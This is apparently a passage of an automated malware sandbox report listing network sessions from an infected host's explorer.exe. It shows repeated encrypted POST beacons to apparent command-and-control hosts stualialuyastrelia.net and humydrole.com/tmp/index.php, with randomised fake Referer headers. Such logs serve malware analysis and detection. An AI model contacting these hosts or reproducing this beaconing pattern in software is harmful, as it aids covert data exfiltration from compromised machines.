                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:26.416713953 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:26.661401033 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:26 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                46192.168.2.64978991.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:27.147722960 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://ppvryxvoper.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:27.147793055 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:27.396476030 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                47192.168.2.64979091.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:27.900469065 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://nxrkxksjynxpq.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:27.900499105 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:28.136992931 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                48192.168.2.64979191.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:28.801691055 CET336OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://dvxbbmfkkatqvmp.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:28.801951885 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:29.046555042 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                49192.168.2.64979291.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:29.707478046 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://jasglbrjehkss.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:29.707515955 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:29.948589087 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:29 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                50192.168.2.64979391.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:30.848871946 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://pkdsxtrnnsilv.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:30.848917007 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:31.087908030 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:30 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                51192.168.2.64979491.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:31.755906105 CET337OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://hikiougahtwnlcja.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:31.755934000 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:32.003036976 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                52192.168.2.64979591.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:34.264954090 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://nrsrbinqble.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:34.264995098 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:34.515181065 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:34 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                53192.168.2.64979691.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:40.011343002 CET335OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://vlbpwjtrbugwgo.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:40.011377096 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:40.257435083 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:40 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                54192.168.2.64979991.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:51.658582926 CET334OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://kmikpaylaogyt.net/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:51.658634901 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:08:51.910515070 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:08:51 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                55192.168.2.64980091.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:01.342313051 CET332OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://pemmtfcscbh.org/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:01.342344999 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:01.590866089 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:01 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                56192.168.2.64980191.215.85.17804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:08.802618980 CET336OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://viafddhhylriois.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:08.802685022 CET163OUTData Raw: 48 9d 8e be 49 66 22 20 5a 72 51 2e 7f df 24 b9 5d 66 ee 61 f4 1f df ad c2 19 d2 f7 72 82 d3 90 88 a0 8a c3 70 46 ee b6 d6 59 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                Data Ascii: HIf" ZrQ.$]farpFYjqJ,,P;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:09.046092987 CET248INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:08 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                57192.168.2.649803186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:11.901556015 CET338OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://rxymvrbwnrtai.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:11.901588917 CET188OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 0a e8 ec
                                                                                                                                                                                                                                                                                                                Data Ascii: ;nQn$u{lsa|z7nV\+m?!0jHYcM@NA .[k,vu;DDBFs)cOMliGy8+rQy9d
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:12.837784052 CET306INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:12 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Data Raw: 03 00 00 00 72 e8 85
                                                                                                                                                                                                                                                                                                                Data Ascii: r


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                58192.168.2.649804186.182.55.44804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:13.157355070 CET337OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Referer: http://aypwsbxabcck.com/
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                Content-Length: 249
                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:13.157428026 CET303OUTData Raw: 3b 6e 51 10 f7 c8 6e 24 ae ab c1 07 00 75 7f b9 7b 0c ba e1 6c 73 92 61 7c 7a 0e 93 37 c3 c3 6e ed 56 c4 5c 02 1a 2b 6d 9b 9b 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 5f 3b fa b9
